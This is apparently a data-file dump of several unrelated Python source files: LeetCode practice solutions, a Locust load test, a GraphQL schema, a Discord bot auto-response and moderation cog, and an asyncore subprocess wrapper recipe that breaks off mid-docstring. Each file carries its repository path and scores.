RE_IMG_SRC = re.compile(r'<img\s+src=[\'\"](.*?)[\'\"].*?/?>', flags=re.DOTALL|re.MULTILINE)
RE_UNIT_NUM = re.compile(r'([\d.]+)(万)?')
RE_CHINESE = re.compile(r'([\u4e00-\u9fa5]+)') | 2.671875 | 3 |
load-tester/loadTester/loadTester.py | artofimagination/snippets | 2 | 12767388 | <gh_stars>1-10
import time
from locust import HttpUser, task, between
from locust import events
import json
import random
userID = 1
class testUserAdd(HttpUser):
wait_time = between(0.1, 2)
@task(3)
def getUser(self):
self.client.get("/")
pass
@task
def addUser(self):
with self.client.post(f"/insert?name=testUser{self.userID}&email=testEmail{self.userID}&password=<PASSWORD>", {}, catch_response=True) as response:
if response.status_code != 200:
response.failure(f"Got wrong response: {response.text}")
elif response.elapsed.total_seconds() > 5.0:
response.failure("Request took too long")
self.userID = random.random()
def on_start(self):
global userID
self.userID = 1
| 2.546875 | 3 |
leetcode-1.py | liujiaboy/Suanfa | 0 | 12767389 | <gh_stars>0
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def createList(l: list) -> ListNode:
header = current = ListNode()
for i in range(0, len(l)):
current.next = current = ListNode(l[i])
return header.next
def printList(l: ListNode):
while l:
print(l.val)
l = l.next
print(" ")
'''
leetcode - 2 两数相加
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:
header = current = ListNode()
plus = val = 0
while plus or l1 or l2:
val = plus
if l1:
l1, val = l1.next, l1.val + val
if l2:
l2, val = l2.next, l2.val + val
if val >= 10:
plus, val = 1, val - 10
else:
plus = 0
current.next = current = ListNode(val)
return header.next
l1 = [9,9,9,9,9,9,9]
l2 = [9,9,9,9]
listno1 = createList(l1)
listno2 = createList(l2)
printList(listno1)
printList(listno2)
list3 = addTwoNumbers(listno1, listno2)
printList(list3)
'''
'''
#leetcode - 3 最长子串
def lengthOfLongestSubstring(s: str) -> int:
if len(s) == 0:
return 0
tempS = []
maxL = 0
for c in s:
if c in tempS:
tempS[:] = tempS[tempS.index(c) + 1: ]
tempS.append(c)
maxL = maxL if maxL > len(tempS) else len(tempS)
return maxL
print(lengthOfLongestSubstring("aabaab!bb"))
'''
'''
def isPalindrome(x: int) -> bool:
if x < 0 or (x % 10 == 0 and x != 0):
return False
leftV, rightV = x, 0
while leftV > rightV:
rightV = rightV * 10 + leftV % 10
leftV = int(leftV / 10)
return leftV == rightV or leftV == int(rightV/10)
print(12 % 10)
print(isPalindrome(0))
'''
"""
def deleteDuplicates(head: ListNode) -> ListNode:
num = []
headL = l = ListNode()
while head:
if head.val not in num:
num.append(head.val)
l.next = l = ListNode(head.val)
head = head.next
return headL.next
l1 = createList([1,1,2,3,3])
printList(l1)
printList(deleteDuplicates(l1))
"""
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
#[1,null,2,3]
def createTreeNode() -> TreeNode:
# l3 = TreeNode(3)
# l2 = TreeNode(2, l3)
# l1 = TreeNode(1)
# l1.right = l2
# return l1
# 1
# 4 3
# 2
l1 = TreeNode(1)
l2 = TreeNode(4)
l3 = TreeNode(3)
l4 = TreeNode(2)
l1.left = l2
l1.right = l3
l2.right = l4
return l1
#中序遍历
def inorderTraversal(root: TreeNode) -> []:
tempL = []
intL = []
while root or len(tempL):
while root:
tempL.append(root)
root = root.left
root = tempL.pop()
intL.append(root.val)
root = root.right
return intL
"""
# 先序 递归调用
def xianxu(root: TreeNode) -> []:
def bianli(node: TreeNode):
if not node: return
intL.append(node.val)
bianli(node.left)
bianli(node.right)
intL = []
bianli(root)
return intL
"""
"""
# 先序 使用队列思想
def xianxu(root: TreeNode) -> []:
nodeL = []
intL = []
while root or len(nodeL):
while root:
nodeL.append(root)
intL.append(root.val)
root = root.left
root = nodeL.pop()
root = root.right
return intL
"""
"""
# 后续遍历:左 右 中
def houxu(root: TreeNode) -> []:
nodeL = []
intL = list()
prev = None
while root or len(nodeL):
while root:
nodeL.append(root)
root = root.left
root = nodeL.pop()
if not root.right or prev == root.right:
intL.append(root.val)
prev = root
root = None
else:
nodeL.append(root)
root = root.right
return intL
L = createTreeNode()
print(houxu(L))
"""
"""
# 链表反转
l1 = [1,2,3,4,5,6,7, 8, 9]
listno1 = createList(l1)
def fanzhuan(l: ListNode) -> ListNode:
header = current = ListNode()
while l:
l1 = ListNode(l.val)
l1.next = header.next
header.next = l1
l = l.next
return header.next
#printList(fanzhuan(listno1))
"""
# LRU缓存机制
class DlinkedNode:
def __init__(self, key = 0, value = 0):
self.key = key
self.value = value
self.pre = None
self.next = None
class Solution:
cache = dict()
# 可以使用双向链表来实现,这里取巧,使用list
node = list()
count = 0
def LRU(self, operations: list, k: int) -> list:
self.count = k
resultL = []
for i in range(len(operations)):
innderL = operations[i]
if innderL[0] == 1:
self.set(innderL[1], innderL[2])
elif innderL[0] == 2:
resultL.append(self.get(innderL[1]))
return resultL
def set(self, key: int, value: int):
if key in self.cache:
#在cache中,移动到最前
self.node.remove(key)
# 插入最前边
self.cache[key] = value
self.node.insert(0, key)
if len(self.node) > self.count:
delkey = self.node.pop()
self.cache.pop(delkey)
def get(self, key: int) -> int:
if key in self.cache:
self.node.remove(key)
self.node.insert(0, key)
return self.cache[key]
else:
return -1
#sol = Solution()
#operations = [[1,1,1],[1,2,2],[1,3,2],[2,1],[1,4,4],[2,2]]
#print(sol.LRU(operations, 3))
"""
# 排列好的有重复数据的list,二分查找,并输出最小的值,
def search(numss: list, target: int):
if not numss:
return -1
low, high= 0, len(numss)-1
idx = -1
while low <= high:
mid = (low + high) // 2
if numss[mid] < target:
low = mid + 1
elif numss[mid] > target:
high = mid - 1
else:
idx = mid
high = mid - 1
return idx
#list1 = [1,2,2,4]
list1 = [-2,1,2] #2
print(search(list1, 2))
"""
"""
def maxLengthList(arr:[] ) -> []:
# write code here
# 采用队列的思路,先进先出,有重复的则移除前所有的数据
res = []
temp = []
for i in arr:
if i in temp:
temp[:] = temp[temp.index(i) + 1 :]
temp.append(i)
if len(res) < len(temp):
res = temp.copy()
return res
def maxLengthList2(arr:[] ) -> int:
# write code here
# 采用队列的思路,先进先出,有重复的则移除前所有的数据
temp = []
maxL = 0
for i in arr:
if i in temp:
temp[:] = temp[temp.index(i) + 1 :]
temp.append(i)
if maxL < len(temp):
maxL = len(temp)
return maxL
arr = [1,2,3,1,2,3,2,2]
arr = [2,3,4,5]
print(maxLengthList2(arr))
"""
"""
def getLessNums(tinput: [], k: int) -> []:
for i in range(0, len(tinput)):
minIdx = i
minVal = tinput[i]
for j in range(i + 1, len(tinput)):
if minVal > tinput[j]:
minVal = tinput[j]
minIdx = j
tinput[i], tinput[minIdx] = minVal, tinput[i]
if i == k:
break
return tinput[0:k]
print(getLessNums([4,5,1,6,2,7,3,8],4))
"""
"""
这里会把B merge到A中。比如A = [1,2,3], B = [2,5,6]
调用方法会变成A=[1,2,3,0,0,0]自动扩展3个元素
然后把Bmerge到A中,最后的结果为[1,2,2,3,5,6]
"""
"""
def mergeTwoList(A:[], m: int, B:[], n:int):
# 1. 使用双指针,这里直接使用m和n即可
# 2. A、B从最后一个元素进行对比
# 3. A的值比B大,则A[m-1]的值移动到最后,指针左移
# 4. B的值比A大,则直接赋值,指针左移
if not A or not B: return
while m > 0 and n > 0:
#
if A[m-1] >= B[n-1]:
A[m+n-1] = A[m-1]
m -= 1
else:
A[m+n-1] = B[n-1]
n -= 1
if n > 0: A[:n] = B[:n]
A = [1,2,3,0,0,0]
B = [2,5,6]
mergeTwoList(A, 3, B, 3)
print(A)
"""
def solveStr(s: str) -> str:
# write code here
l = list(s)
for i in range(0, len(l) // 2):
l[i], l[len(l)-1-i] = l[len(l)-1-i], l[i]
return "".join(l)
print(solveStr("abcde")) | 3.75 | 4 |
gql/schema/Media.py | allanwright/media-classifier-api | 1 | 12767390 | <reponame>allanwright/media-classifier-api
import graphene
from .Classification import Classification
from .Entity import Entity
class Media(graphene.ObjectType):
name = graphene.String()
classification = graphene.Field(Classification)
entities = graphene.List(Entity)
@staticmethod
def resolve_classification(parent, info):
prediction = info.context['classifier'].predict(parent.name)
classification = Classification()
classification.label = prediction['label']
classification.confidence = prediction['probability']
return classification
@staticmethod
def resolve_entities(parent, info):
return [{ 'type': k, 'value': v } for (k, v) in info.context['recognizer'].predict(parent.name)]
| 2.515625 | 3 |
Cogs/Responses.py | camielverdult/CorpBot.py | 0 | 12767391 | <reponame>camielverdult/CorpBot.py<filename>Cogs/Responses.py
import discord
import re
import time
from discord.ext import commands
from Cogs import Settings, DisplayName, Utils, Nullify, PickList
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
bot.add_cog(Responses(bot, settings))
class Responses(commands.Cog):
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
global Utils, DisplayName
Utils = self.bot.get_cog("Utils")
DisplayName = self.bot.get_cog("DisplayName")
# Regex values
self.regexUserName = re.compile(r"\[\[user\]\]", re.IGNORECASE)
self.regexUserPing = re.compile(r"\[\[atuser\]\]", re.IGNORECASE)
self.regexServer = re.compile(r"\[\[server\]\]", re.IGNORECASE)
self.regexHere = re.compile(r"\[\[here\]\]", re.IGNORECASE)
self.regexEveryone = re.compile(r"\[\[everyone\]\]", re.IGNORECASE)
self.regexDelete = re.compile(r"\[\[delete\]\]", re.IGNORECASE)
self.regexMute = re.compile(r"\[\[mute:?\d*\]\]", re.IGNORECASE)
self.regexKick = re.compile(r"\[\[kick\]\]", re.IGNORECASE)
self.regexBan = re.compile(r"\[\[ban\]\]", re.IGNORECASE)
self.regexSuppress = re.compile(r"\[\[suppress\]\]", re.IGNORECASE)
async def _get_response(self, ctx, message):
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return {}
# Check for matching response triggers here
# Remove newlines for better matching
content = message.replace("\n", " ")
for trigger in message_responses:
if not re.fullmatch(trigger, content):
continue
response = {"matched": trigger}
# Got a full match - build the message, send it and bail
m = message_responses[trigger]
if self.regexDelete.search(m):
response["delete"] = True
if self.regexSuppress.search(m):
response["suppress"] = True
action = "ban" if self.regexBan.search(m) else "kick" if self.regexKick.search(
m) else "mute" if self.regexMute.search(m) else None
if action:
response["action"] = action
if action == "mute":
# Let's get the mute time - if any
try:
response["mute_time"] = int(self.regexMute.search(
m).group(0).replace("]]", "").split(":")[-1])
except:
pass
m = re.sub(self.regexUserName, "{}".format(
DisplayName.name(ctx.author)), m)
m = re.sub(self.regexUserPing, "{}".format(ctx.author.mention), m)
m = re.sub(self.regexServer, "{}".format(
Nullify.escape_all(ctx.guild.name)), m)
m = re.sub(self.regexHere, "@here", m)
m = re.sub(self.regexEveryone, "@everyone", m)
# Strip out leftovers from delete, ban, kick, mute, and suppress
for sub in (self.regexDelete, self.regexBan, self.regexKick, self.regexMute, self.regexSuppress):
m = re.sub(sub, "", m)
response["message"] = m
return response
return {}
@commands.Cog.listener()
async def on_message(self, message):
# Gather exclusions - no bots, no dms, and don't check if running a command
if message.author.bot:
return
if not message.guild:
return
ctx = await self.bot.get_context(message)
if ctx.command:
return
# Gather the response info - if any
response = await self._get_response(ctx, message.content)
if not response:
return
# See if we're admin/bot-admin - and bail if suppressed
if Utils.is_bot_admin(ctx) and response.get("suppress"):
return
# Walk punishments first in order of severity (ban -> kick -> mute)
if response.get("action") in ("ban", "kick"):
action = ctx.guild.ban if response["action"] == "ban" else ctx.guild.kick
await action(ctx.author, reason="Response trigger matched")
elif response.get("action") == "mute":
mute = self.bot.get_cog("Mute")
mute_time = None if not response.get("mute_time") else int(
time.time())+response["mute_time"]
if mute:
await mute._mute(ctx.author, ctx.guild, cooldown=mute_time)
# Check if we need to delete the message
if response.get("delete"):
try:
await message.delete()
except:
pass # RIP - couldn't delete that one, I guess
# Don't send an empty message, or one with just whitespace
if response.get("message", "").strip():
return await ctx.send(response["message"], allowed_mentions=discord.AllowedMentions.all())
@commands.command()
async def addresponse(self, ctx, regex_trigger=None, *, response=None):
"""Adds a new response for the regex trigger - or updates the response if the trigger exists already. If the trigger has spaces, it must be wrapped in quotes (bot-admin only).
Value substitutions:
[[user]] = user name
[[atuser]] = user mention
[[server]] = server name
[[here]] = @here ping
[[everyone]] = @everyone ping
Standard user behavioral flags (do not apply to admin/bot-admin):
[[delete]] = delete the original message
[[ban]] = bans the message author
[[kick]] = kicks the message author
[[mute]] = mutes the author indefinitely
[[mute:#]] = mutes the message author for # seconds
Admin/bot-admin behavioral flags:
[[suppress]] = suppresses output for admin/bot-admin author matches
Example: $addresponse "(?i)(hello there|\\btest\\b).*" [[atuser]], this is a test!
This would look for a message starting with the whole word "test" or "hello there" (case-insensitive) and respond by pinging the user and saying "this is a test!"
"""
if not await Utils.is_bot_admin_reply(ctx):
return
if not regex_trigger or not response:
return await ctx.send("Usage: `{}addresponse regex_trigger response`".format(ctx.prefix))
# Ensure the regex is valid
try:
re.compile(regex_trigger)
except Exception as e:
return await ctx.send(Nullify.escape_all(str(e)))
# Save the trigger and response
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
context = "Updated" if regex_trigger in message_responses else "Added new"
message_responses[regex_trigger] = response
self.settings.setServerStat(
ctx.guild, "MessageResponses", message_responses)
return await ctx.send("{} response trigger!".format(context))
@commands.command()
async def edittrigger(self, ctx, response_index=None, *, regex_trigger=None):
"""Edits the regex trigger for the passed index. The triggers passed here do not require quotes if there are spaces (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
if not regex_trigger or not response_index:
return await ctx.send("Usage: `{}edittrigger response_index regex_trigger`".format(ctx.prefix))
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
# Ensure the passed index is valid
try:
response_index = int(response_index)
assert 0 < response_index <= len(message_responses)
except:
return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
# Ensure the regex is valid
try:
re.compile(regex_trigger)
except Exception as e:
return await ctx.send(Nullify.escape_all(str(e)))
# Update the response
ordered_responses = {}
for index, key in enumerate(message_responses, start=1):
ordered_responses[regex_trigger if index ==
response_index else key] = message_responses[key]
self.settings.setServerStat(
ctx.guild, "MessageResponses", ordered_responses)
return await ctx.send("Updated response trigger at index {:,}!".format(response_index))
@commands.command()
async def editresponse(self, ctx, response_index=None, *, response=None):
"""Edits the response for the passed index. The response passed here does not require quotes if there are spaces (bot-admin only).
Value substitutions:
[[user]] = user name
[[atuser]] = user mention
[[server]] = server name
[[here]] = @here ping
[[everyone]] = @everyone ping
Standard user behavioral flags (do not apply to admin/bot-admin):
[[delete]] = delete the original message
[[ban]] = bans the message author
[[kick]] = kicks the message author
[[mute]] = mutes the author indefinitely
[[mute:#]] = mutes the message author for # seconds
Admin/bot-admin behavioral flags:
[[suppress]] = suppresses output for admin/bot-admin author matches
Example: $editresponse 1 [[atuser]], this is a test!
This would edit the first response trigger to respond by pinging the user and saying "this is a test!"""
if not await Utils.is_bot_admin_reply(ctx):
return
if not response or not response_index:
return await ctx.send("Usage: `{}editresponse response_index response`".format(ctx.prefix))
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
# Ensure the passed index is valid
try:
response_index = int(response_index)
assert 0 < response_index <= len(message_responses)
except:
return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
# Update the response
message_responses[list(message_responses)[response_index-1]] = response
self.settings.setServerStat(
ctx.guild, "MessageResponses", message_responses)
return await ctx.send("Updated response at index {:,}!".format(response_index))
@commands.command()
async def responses(self, ctx):
"""Lists the response triggers and their responses (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
entries = [{"name": "{}. ".format(i)+Nullify.escape_all(x), "value": Nullify.escape_all(
message_responses[x])} for i, x in enumerate(message_responses, start=1)]
return await PickList.PagePicker(title="Current Responses", list=entries, ctx=ctx).pick()
@commands.command()
async def remresponse(self, ctx, *, regex_trigger_number=None):
"""Removes the passed response trigger (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
if not regex_trigger_number:
return await ctx.send("Usage: `{}remresponse regex_trigger_number`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
# Make sure we got a number, and it's within our list range
try:
regex_trigger_number = int(regex_trigger_number)
assert 0 < regex_trigger_number <= len(message_responses)
except:
return await ctx.send("You need to pass a valid integer from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
# Remove it, save, and report
message_responses.pop(list(message_responses)[
regex_trigger_number-1], None)
self.settings.setServerStat(
ctx.guild, "MessageResponses", message_responses)
return await ctx.send("Response trigger removed!")
@commands.command()
async def clearresponses(self, ctx):
"""Removes all response triggers (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
self.settings.setServerStat(ctx.guild, "MessageResponses", {})
return await ctx.send("All response triggers removed!")
@commands.command()
async def mvresponse(self, ctx, response_index=None, target_index=None):
"""Moves the passed response index to the target index (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
if response_index == None or target_index == None:
return await ctx.send("Usage: `{}mvresponse [response_index] [target_index]`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
# Make sure our indices are within the proper range
try:
response_index = int(response_index)
target_index = int(target_index)
assert all((0 < x <= len(message_responses)
for x in (response_index, target_index)))
except:
return await ctx.send("Both `response_index` and `target_index` must be valid intergers from 1 to {:,}.\nYou can get a numbered list with `{}responses`".format(len(message_responses), ctx.prefix))
if response_index == target_index:
return await ctx.send("Both indices are the same - nothing to move!")
# Let's get the keys in a list - remove the target, add it to the desired index, then build a new dict with the elements
keys = list(message_responses)
keys.insert(target_index-1, keys.pop(response_index-1))
ordered_responses = {}
for key in keys:
ordered_responses[key] = message_responses[key]
self.settings.setServerStat(
ctx.guild, "MessageResponses", ordered_responses)
return await ctx.send("Moved response from {:,} to {:,}!".format(response_index, target_index))
@commands.command()
async def chkresponse(self, ctx, *, check_string=None):
"""Reports a breakdown of the first match (if any) in the responses for the passed check string (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx):
return
if check_string == None:
return await ctx.send("Usage: `{}checkresponse [check_string]`\nYou can get a numbered list with `{}responses`".format(ctx.prefix, ctx.prefix))
message_responses = self.settings.getServerStat(
ctx.guild, "MessageResponses", {})
if not message_responses:
return await ctx.send("No responses setup! You can use the `{}addresponse` command to add some.".format(ctx.prefix))
response = await self._get_response(ctx, check_string)
if not response:
return await ctx.send("No matches!")
# Got a match - let's print out what it will do
description = Nullify.escape_all(
response.get("matched", "Unknown match"))
entries = []
# Let's walk the reponse and add values
entries.append({"name": "Output Suppressed for Admin/Bot-Admin:",
"value": "Yes" if response.get("suppress") else "No"})
if response.get("action") == "mute":
mute_time = "indefinitely" if not response.get("mute_time") else "for {:,} second{}".format(
response["mute_time"], "" if response["mute_time"] == 1 else "s")
entries.append(
{"name": "Action:", "value": "Mute {}".format(mute_time)})
else:
entries.append({"name": "Action:", "value": str(
response.get("action")).capitalize()})
entries.append(
{"name": "Delete:", "value": "Yes" if response.get("delete") else "No"})
entries.append({"name": "Output Message:", "value": "None" if not response.get(
"message", "").strip() else response["message"]})
return await PickList.PagePicker(title="Matched Response", description=description, list=entries, ctx=ctx).pick()
| 2.265625 | 2 |
PubNubPublishARM/GetUniqueId.py | IDEO-coLAB/demo-vehicle-rec-microservice | 1 | 12767392 | # File : GetUniqueId.py
# Subprogram to generate a unique id for Pubnub message
# Author: <NAME>
import uuid
def GenerateId():
unique_id=uuid.uuid1()
str_id=str(unique_id)
return str_id
| 2.796875 | 3 |
recipes/Python/576957_Asynchronous_subprocess_using/recipe-576957.py | tdiprima/code | 2,023 | 12767393 | <gh_stars>1000+
#!/usr/bin/env python
"""asyncsubproc.py: Asynchronous subprocess communication using asyncore.
The `AsyncPopen` class wraps the I/O pipes from `Popen` in asynchronous
dispatchers, providing asynchronous communication with the subprocess using
`asyncore.loop()` to read and write in parallel with other I/O. The
`SubprocessExecutor` class wraps `AsyncPopen` in an `Executor`, allowing
inline subprocess execution using a generator.
Full-duplex Communication:
Data that the subprocess writes might not be made available to the parent until
the subprocess calls `flush()` or exits; thus, a parent which attempts to write
data, read a response, and then write new data contingent on the response might
find itself deadlocked. There seems to be no way for the parent process to
force flushing of the subprocess output; changing the value of the `bufsize`
parameter to `Popen()` to zero (or any other value) doesn't do it, and
`asyncore.file_dispatcher` already sets `O_NONBLOCK` on the pipes.
Subprocess Exit:
Detecting subprocess exit while avoiding zombie subprocesses can be tricky in
asynchronous code. Calling `wait()` on a subprocess would block, leaving three
alternatives for checking for subprocess exit:
1) Exit the asynchronous select loop (e.g. `asyncore.loop()`) occasionally
to call `poll()` on any unterminated subprocesses. This requires maintaining a
list of all unterminated subprocess objects, along with any context needed to
handle the subprocess exit.
2) Set a handler for `SIGCHLD` which calls `os.waitpid(-1, os.WNOHANG)`,
and then use the return value to locate the asynchronous process object and
handle the subprocess exit. This must be done in a loop to avoid missing
consolidated signals, requires maintaining a list of all unterminated
subprocesses, and is limited by reentrancy restrictions on signal handlers.
3) Check for `stdout` and `stderr` to both be closed, which can be done as
part of the asynchronous loop which reads data. This requires that at least one
of `stdout` and `stderr` be a pipe, but an asynchronous subprocess is probably
unnecessary in the first place if neither is a pipe. There is no absolute
guarantee that the subprocess has exited when `stdout` and `stderr` have
closed, but once they have, no more data is coming. However, because `wait()`
is not being called on the subprocesses, special care has to be taken to avoid
leaving zombie subproceses. There are again three alternatives:
a) Set `SIGCHLD` to `SIG_IGN`. This should work on most varieties of UNIX
including Mac OS X. However, it prevents collecting the exit status of the
subprocess; `poll()` will return `None` and `wait()` will raise an `OSError`
exception.
b) Set a handler for `SIGCHLD` as in solution (2) above; if this is to be
implemented, it may be better to simply implement solution (2) rather than
waiting for the output pipes to close in the first place.
c) Call `wait()` on the subprocess after stdout and stderr are closed.
While this will block (briefly), it should be reasonably safe unless the
subprocess does something very unusual.
`SubprocessExecutor` waits for `stdout` and `stderr` to both be closed, and
then calls `wait()` on the subprocess if no handler for `SIGCHLD` is set.
References:
http://code.activestate.com/recipes/577600/ [queued SIGALRM alarms]
http://code.activestate.com/recipes/576965/ [event-based asynchronous pattern]
http://code.activestate.com/recipes/576967/ [asynchronous pipe I/O]
"""
import os
import sys
import signal
import threading
from traceback import print_exc
from subprocess import Popen, PIPE
from logging import ERROR, INFO
import alarm
from asyncpipes import PipeDispatcher, InputPipeDispatcher, OutputPipeDispatcher
from worker import Executor
from observer import Observable
if __name__ == '__main__':
import optparse
from asyncore import loop
from string import digits
from time import sleep
from worker import execute, ExecutionQueue
__version__ = '$Revision: 3414 $'.split()[1]
__usage__ = 'usage: %prog [options] [data]'
class AsyncPopen(Observable, Popen):
"""An extension to Popen which creates a subprocess with asynchronous
pipes for input and output. Pipe output can be read using an Observer
pattern while asyncore.loop() is run.
Also contains additional small extensions, such as a subprocess timeout
and a fix to handling of signals for subprocesses.
"""
def __init__(self, argv, map=None, timeout=None, close_when_done=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE, preexec_fn=None, bufsize=0, **popen_keyw):
"""Accepts all the same arguments and keywords as `subprocess.Popen`.
Input or outputs specified as `PIPE` (now the default) for are wrapped
in an asynchronous pipe dispatcher.
The timeout is used to create an alarm, which can be cancelled by
calling `cancel_timeout()`, `communicate()`, `wait()` or `kill()`.
"""
Observable.__init__(self)
self._map = map
# Create the subprocess itself, wrapping preexec_fn in the clear_signals call
Popen.__init__(self, argv, preexec_fn=lambda: self.clear_signals(preexec_fn),
stdin=stdin, stdout=stdout, stderr=stderr, **popen_keyw)
# Set the timeout on the subprocess. If it fails, ignore the failure.
try:
fto = float(timeout)
self._alarmobj = alarm.alarm(fto, self.kill) if fto > 0 else None
except:
self._alarmobj = None
# Wrap the pipe I/O. Sets the Popen and pipe buffer sizes the same; perhaps not optimal.
if stdout == PIPE:
self.stdout = OutputPipeDispatcher(self.stdout, map=map, ignore_broken_pipe=True,
universal_newlines=self.universal_newlines, maxdata=bufsize)
self.stdout.obs_add(self._pipe_event)
if stderr == PIPE:
self.stderr = OutputPipeDispatcher(self.stderr, map=map, ignore_broken_pipe=True,
universal_newlines=self.universal_newlines, maxdata=bufsize)
self.stderr.obs_add(self._pipe_event)
if stdin == PIPE:
self.stdin = InputPipeDispatcher(self.stdin, map=map, ignore_broken_pipe=True,
close_when_done=close_when_done, maxdata=bufsize)
self.stdin.obs_add(self._pipe_event)
def cancel_timeout(self, logger=None):
if not self._alarmobj: return
try:
alarm.cancel(self._alarmobj)
except:
if logger: logger.debug("Error canceling child PID %d alarm" % child.pid, exc_info=1)
finally:
self._alarmobj = None
def wait(self, logger=None):
returncode = Popen.wait(self)
self.cancel_timeout(logger=logger)
return returncode
@staticmethod
def clear_signals(preexec_fn):
"""Wraps any preexec_fn in order to clear any signal handlers."""
for s in range(1, signal.NSIG):
try:
if s not in [signal.SIGKILL, signal.SIGSTOP]: signal.signal(s, signal.SIG_DFL)
except:
pass
if callable(preexec_fn): preexec_fn()
def kill(self):
"""Kill the child process with extreme prejudice."""
try:
if self.returncode is None: os.kill(self.pid, signal.SIGKILL)
finally:
self.cancel_timeout()
def fetch_output(self, clear=True):
"""Fetch data from the subprocess output pipes.
An output file not set to a pipe returns an empty string.
"""
outdata = self.stdout.fetch_data(clear) if self.stdout is not None else ''
errdata = self.stderr.fetch_data(clear) if self.stderr is not None else ''
return outdata, errdata
def output_closed(self):
"""Return true if both subprocess output pipes are closed.
Can be used to detected the termination of the subprocess. An output
file not sent to a pipe is ignored.
"""
outread = self.stdout.readable() if self.stdout is not None else False
errread = self.stderr.readable() if self.stderr is not None else False
return not (outread or errread)
def _pipe_event(self, observed, event):
"""Forward events on the pipes. The forwarded events contain the pipe
event and the pipe itself as a two-element tuple."""
self._obs_notify((event, observed))
class SubprocessExecutor(Executor):
"""Executes subprocesses, reading and writing data using `asyncore`.
For each subprocess to be created, the generator must yield either the
object to be passed to the `argv` argument of the `Popen` constructor,
or a dictionary containing a required `argv` key, an optional `input` key
containing a string to be written to `stdin` of the subprocess, and keys
corresponding to the keyword parameters to `AsyncPopen` (the same keywords
as the `child_spawn()` method).
Once the subprocess has exited, the executor will call `send()` on the
generator, passing a 4-element tuple containing the data read from
`stdout` and `stderr`, the exit status returned by `Popen.poll()`, and the
pid of the subprocess. The generator can then yield the parameters for
another subprocess.
"""
def __init__(self, generator, exc_handler=print_exc, logger=None, **async_popen_keyw):
"""Initialize a subprocess executor.
Additional keyword parameters to this constructor (usually passed
through the decorator) will be passed to `AsyncPopen`.
"""
Executor.__init__(self, generator, exc_handler)
self._logger = logger
self.__async_popen_dict = async_popen_keyw
self.__current_child = None
def _execute(self, logger=None, **async_popen_keyw):
"""Iterate the generator to completion (in the calling thread).
The generator must yield the parameters for the first subprocess,
which will be passed to `_spawn()`.
Additional keyword parameters passed to this object when called will
be passed to `AsyncPopen` (and override values passed to this object's
constructor).
"""
self.__async_popen_dict.update(async_popen_keyw)
if logger is not None: self._logger = logger
# Get the command to be executed from the generator
self.__coerce_and_spawn(self.next())
def _pipe_closed(self, observed, event):
"""Called when one of the output pipes (stdout or stderr) is closed.
Once both are closed, declare the subprocess finished and call
`_child_exit()`.
"""
if observed.output_closed(): self._child_exit(observed)
def _child_exit(self, child):
"""Called once `stdout` and `stderr` are both closed.
Cleans up the subprocess, and then passes the subprocess results tom
the generator by calling `send()`. If the generator yields parameters
for another subprocess, calls `_child_spawn()`.
"""
self.__current_child = None
# Close stdin for the child, so that it knows it won't be getting more data
try:
if child.stdin is not None: child.stdin.close()
except:
if self._logger: self._logger.debug("Error closing stdin for PID %d" % child.pid, exc_info=1)
# Wait for the child if there's no signal handler
if signal.getsignal(signal.SIGCHLD) == signal.SIG_DFL:
try:
# This will cancel the alarm
returncode = child.wait(logger=self._logger)
except:
if self._logger: self._logger.debug("Error waiting for child PID %d" % child.pid, exc_info=1)
else: print_exc(file=sys.stderr)
else:
child.cancel_timeout(logger=self._logger)
# This next will return None unless an exit status injector has been set up.
returncode = child.poll()
# Extract the result from the child process; and move on with the executor
try:
outdata, errdata = child.fetch_output()
child_result = (outdata, errdata, returncode, child.pid)
if self._logger: self._logger.debug("PID %d exited with code %s" % (child.pid, returncode))
self.__coerce_and_spawn(self.send(child_result))
except:
self.throw(*sys.exc_info())
def close(self):
"""Kill the subprocess when closing the generator."""
child = self.__current_child
if child:
try:
child.kill()
except:
if self._logger: self._logger.exception("Error killing child PID %d" % child.pid)
else: print_exc(file=sys.stderr)
else:
self.__current_child = None
Executor.close(self)
def __coerce_and_spawn(self, arg):
"""Coerce the argument into a call to `_child_spawn()`"""
try:
self._child_spawn(**arg)
except:
self._child_spawn(argv=arg)
def _child_spawn(self, argv=None, input=None, **async_popen_keyw):
"""Create the subprocess and send the data to the input pipe. Called
with the value(s) yielded by the generator.
If a subprocess is to be spawned, the `argv` keyword must be supplied
